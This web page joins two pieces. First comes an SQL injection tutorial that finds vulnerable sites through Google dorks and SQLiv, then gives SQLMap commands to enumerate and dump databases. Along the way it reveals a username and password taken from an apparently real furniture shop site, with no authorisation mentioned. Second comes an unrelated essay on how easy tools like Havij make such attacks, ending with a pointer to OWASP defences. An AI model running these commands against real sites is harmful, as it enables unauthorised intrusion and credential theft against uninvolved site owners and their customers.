The use of databases for various data storage management greatly increases in web app development as time goes on. Database facilitates interaction between users and servers. The database (or in terms of Database Management System abbreviated to DMBS) provides various benefits including data input and storage, retrieval of large information and the ease of compiling and grouping information. sql injection
But, beside the ease and features that the database offers, as well as the many uses of databases in the world of Information and technology, especially in the development of a website. Unceasingly Pentesters and hackers are trying to find a gap in the security of the database. This is confirmed by the report issued by Positive Technologies researchers, information security research centers in Europe, in the second quarter of 2017, the top 10 web application attacks were dominated by cross-site-scripting of 39.1% and Sql- injection of 24.9%. Positive Technologies said the report in the second quarter is not much different from the first quarter.
Figure 1. Top 10 web application attacks (source SPY24.org)
This is both interesting and worrying, because in a database there are a lot of information like credential accounts (admin and user), financial information details (such as credit cards, bank accounts, etc.) and so on. Also, to do SQL injection attacks does not always require expert injecting capabilities, in the sense, kids can do it. Because there are many free applications that are able to perform SQL-injection automatically, such as SQLMap. SQLMap is an open source application for penetration testing activities that aims to conduct SQL-injection attacks in a database security hole automatically. Here I will show you how to do SQL injection using SQLMap in Linux Kali. No special capabilities are required, but will be worth more if you master a scripting language or SQL database technology.
This tutorial is recommended for those who are new to SQL injection in Kali Linux, just for fun, or whom want to see how SQL works. It is not recommended to those are highly skilled Penetration Testers already.
1. Search for sites vulnerable to SQL injection
One of the ways to find vulnerable web sites is to use Google dorks. This table is borrowed from the site blackmoreops.com:
|Google dorks||Google dorks||Google dorks|
SQL USING SQLMAP IN KALI LINUX
Before we are doing the injection attack, of course we must ensure that the server or target has a database security hole. To find database security holes, there are several methods we can use. Among them, Google dorking, is used mostly by hacker and penetration testers. Luckily there is a tool that is able to do that automatically. But we have to install its tool first. The tool is called SQLiv (SQL Vulnerability Scanner).
STEP 1 : INSTALL SQLiv on KALI LINUX
Type commands below into your terminal to install SQLiv:~# git clone https://github.com/Hadesy2k/sqliv.git
~# cd sqliv && sudo python2 setup.py -i
Once SQLiv is installed in your Kali Linux, it is stored in the path /usr/bin/sqliv. Which, you can call directly from the terminal, by typing ‘sqliv’. Now lets take a look at SQLIv features.
STEP 2 : FINDING SQL INJECTION VULNERABILITIES
We will use Google Dorking to scan and find the SQL injection hole in targets. Lets take a simple dork, and let SQLiv scan trough every single target and look for an ecommerce vulnerability at the following URL pattern ‘item.php?id=’. To find other patterns just google for “google dork list”.~# sqliv -d inurl:item.php?id= -e google -p 100
By default, SQLiv will crawl first page on search engine, which on google 10 sites per page. Thus, here we define argument -p 100 to crawl 10 pages (100 sites). Based on the dork given above we got a result of vulnerable URLS that looks like this:
We found eight of hundred URLs scanned and considered as vulnerable against SQL injection attack. Save the URLS into text editor for further steps.
STEP 3 : SQL INJECTION USING SQLMAP
Once we got at least one SQL injection vulnerable target, next we execute the attack using SQLMap. I take one of them to be a sample here. Firstly, we need to reveal the database name, inside the database has tables and columns, which contain the data.
Target URL :SITe: tem.php?id=25
A. ENUMERATE DATABASE NAME:
Command pattern:~# sqlmap -u “TARGET URL” –dbs
-u / –url : Target URL
–dbs : Enumerate Database/s name
So, the command compiled would look like this:~# sqlmap -u “item.php?id=25” –dbs
From the command above, the result should be look like this
We got the database name “acfurniture”.
B. ENUMERATE TABLES NAME
Command pattern:~# sqlmap -u “TARGET URL” -D database-name –tables
So, the command compiled be like this:~# sqlmap -u ” item.php?id=25″ -D acfurniture –tables
The result should be look like this:
So far, we can conclude that the arrangement of data is, the site acfurniture.com has two databases, acfurniture and information_schema. The database named acfurniture contains four tables: category, product, product_hacked, and settings. There is no compromised table name, but, let’s investigate more. Let see what is inside settings table. Inside the table is actually there are columns, and the data.
C. ENUMERATE COLUMNS
Command pattern:~# sqlmap -u “TARGET URL” -D database-name -T table-name –columns
So, the command compiled be like this:~# sqlmap -u ” item.php?id=25″ -D acfurniture -T settings –columns
The output should be look like this:
The settings table consist of 6 columns, and this is actually a credential account. Lets dump those data.
D. DUMP DATA
Command pattern:~# sqlmap -u “TARGET URL” -D database-name -T table-name -C columns –dump
So, the command compiled be like this:~# sqlmap -u “item.php?id=25” -D acfurniture -T settings -C username,password –dump
Or you can also dump all data inside the table, using command:~# sqlmap -u “item.php?id=25” -D acfurniture -T settings –dump
The output should be look like this:
Username : Handsome
Password : 9HPKO2NKrHbGmywzIzxUi
Alright, we are done dumping data in database using SQL injection. Our next tasks are, to find the door or admin panel, admin login page on the target sites. Before do that, make sure whether that password (9HPKO2NKrHbGmywzIzxUi) is encrypted or not, if so, then we need to decrypt it first. That is another topic, cracking and decrypting.
Even here we are not actually hacking into the target site, at least we have learned a lot about SQL-injection using SQLMap in Kali Linux easily and we dump the credentials account. This technique is used mostly by carder (hacker who is looking for Credit Card account on E-commerce sites) which targeting Financial, banking, shop, or e-commerce sites which store their user credit card information.
Hacking is child’s play – SQLinjection with Havij by 3
You know what really strikes me about a lot of the hacks we’ve seen lately? It just seems too easy. I mean we’re seeing a huge number of attacks (an unprecedented number, by some figures) and all too often the perpetrator is a kid. I don’t mean that in a relative sense to myself as I get older, I mean literally a child.
The problem, of course, is that many of these “hacks” have become simple point and shoot affairs using freely available tools. In the case of SQL injection, tools such as Havij mean that even if you don’t know your indexes from your collations or your UDFs from your DMVs, so long as you can copy and paste a URL you can be an instant “hacker”.
In fact I reckon it’s so easy that even my 3 year old can be a successful hacker. Turns out that’s not too far from the truth:
See how easy it is? Let’s move on and let me give you some more context around the ease and prevalence of these attacks. Firstly, remember that injection remains in the number one spot in the OWASP Top 10. What makes SQLi particularly dangerous is that it’s classified as both “easy” to exploit (which I think we can now all agree on) and with an impact of “severe”.
How severe? As in the example above, SQLi can readily be used to access stored credentials in a vulnerable site and even though these were salted and hashed, they’ll easily fall victim to a brute force attack. Last year it was SQLi which brought down Sony Pictures and it was also allegedly SQLi that was behind this year’s LinkedIn breach. It is very, very prevalent.
A quick look through YouTube and you’ll see tutorials such as SQL Injecting With Havij which is notable not for its content, but rather for its presenter. As well as the guy sounding like he’s about 15 years old, it’s also clear he has very little idea of what a SQL database is or even how Havij actually works. This isn’t a criticism of the kid per se, it’s simply an observation about how accessible tools like Havij are. YouTube is littered with similar examples.
Now keep in mind that Havij is a tool that “helps penetration testers” and indeed ITSecTeam who makes the product is a legitimate security firm. But – and this is a big “but” – do a quick search on YouTube and you won’t find too many videos from penetration testers nor will you find many comments from people with a vocab broader than Ari’s. No, these are kids just looking to smash and grab whatever they can from vulnerable websites.
Of course Havij isn’t the only tool of this kind, products like sqlmap are also extremely popular and in this case, also open source. Unlike Havij it’s purely command line based (probably a bit trickier for a 3 year old who can’t read yet), and also unlike Havij the audience commentating on it via YouTube and other forums is a little more, well, mature.
It’s interesting to look at the modus operandi of how these tools are being used. In this video about How To Use Havij we’re first shown how to unlock the Pro version with a cracked key then how the author has a list of “Dorks” – clearly Google Dorks – with potentially vulnerable URL patterns. This amounts to nothing more than URLs with a query string called “ID”. These guys are simply trawling the internet, pointing Havij at potentially vulnerable URLs and giving it a shot. When it doesn’t work they’ll just move onto the next one.
And that’s the final bit of insight I’ll leave you with; being a target doesn’t mean being a large multinational or supporting a cause that doesn’t sit well with hacktivists nor does it mean presenting some sort of financial upside to those who can break through your security. No, being a target means being on the internet. End of story.
For those looking to protect their applications from SQLi, take a look at the first part of my series on the OWASP Top 10 for .NET developers: Injection.